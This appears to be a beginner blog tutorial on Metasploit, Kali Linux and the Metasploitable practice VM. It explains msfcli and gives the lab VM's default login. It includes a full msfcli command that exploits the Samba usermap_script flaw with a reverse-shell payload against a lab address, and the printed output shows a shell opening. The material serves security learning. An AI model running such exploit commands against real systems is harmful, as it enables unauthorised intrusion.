Metasploit framework for hackers and pentesters guide
What is Metasploit?
The Metasploit Framework (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.
Metasploit is one of the single most useful security auditing tools freely available to security professionals today, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment. Also, when speaking about Metasploit we can’t forget to speak about Kali Linux.
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It contains several hundred tools that are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics, and Reverse Engineering.
Kali Linux is developed, funded, and maintained by Offensive Security, a leading information security training company.
you may like also how to install kali Linux properly
what is Metasploitable?
Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.
The VM will run on any recent VMware products and other visualization technologies such as VirtualBox.
You can download the image file of Metasploitable 2 from SourceForge. Once you have downloaded the Metasploitable VM, extract the zip file, open up the .vmx file using your VMware product of choice, and power it on. Then after a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.
Metasploit is written in Ruby and has been in development for many years one can more easily understand the Metasploit architecture by taking a look under its hood.
In learning how to use Metasploit, take some time to make yourself familiar with its filesystem and libraries. In Kali Linux, Metasploit is provided in the Metasploit-framework package and is installed in the /usr/share/Metasploit-framework directory, the top-level of which is shown below.
METASPLOIT OBJECT MODEL
In the Metasploit Framework, all modules are Ruby classes.
- Modules inherit from the type-specific class
- The type-specific class inherits from the Msf::Module class
- There is a shared common API between modules
Payloads are slightly different.
- Payloads are created at runtime from various components
- Glue together stagers with stages
There are many different interfaces to use with this hacking tool, each with its own strengths and weaknesses. There is no one perfect interface to use with the Metasploit console, although the MSFConsole is the only supported way to access most Metasploit commands.
It is still beneficial, however, to be comfortable with all Metasploit interfaces.
you may want to install kali NetHunter on your android
What is the MSFcli?
The msfcli provides a powerful command-line interface to the framework. This allows you to easily add Metasploit exploits into any scripts you may create.
Command Line Interface Commands
For msfcli help: type msfcli –h.
Note: when using msfcli, variables are assigned using the “equal to” operator = and that all options are case-sensitive.
root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E [*] Please wait while we load the module tree... =[ metasploit v4.5.0-dev [core:4.5 api:1.0] + -- --=[ 936 exploits - 500 auxiliary - 151 post + -- --=[ 252 payloads - 28 encoders - 8 nops =[ svn r15767 updated today (2012.08.22) RHOST => 172.16.194.172 PAYLOAD > cmd/unix/reverse [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo cSKqD83oiquo0xMr; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "cSKqD83oiquo0xMr\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400 uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
If you aren’t entirely sure about what options belong to a particular module, you can append the letter O to the end of the string at whichever point you are stuck.
root@kali:~# msfcli exploit/multi/samba/usermap_script O [*] Initializing modules... Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port
To display available payloads for the current module, append the letter P to the msfcli command line string.
root@kali:~# msfcli exploit/multi/samba/usermap_script P [*]Initializing modules...
Benefits of the MSFcli Interface
- Supports the launching of exploits and auxiliary modules
- Useful for specific tasks
- Good for learning
- Convenient to use when testing or developing a new exploit
- Good tool for one-off exploitation
- Excellent if you know exactly which exploit and options you need
- Wonderful for use in scripts and basic automation
The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks.
It also doesn’t support any of the advanced automation features of msfconsole.
congratulation you have reached the end hope now you know what Metasploit is. if you are having a question don’t keep it for yourself. Share with us. for more information go offensive security official page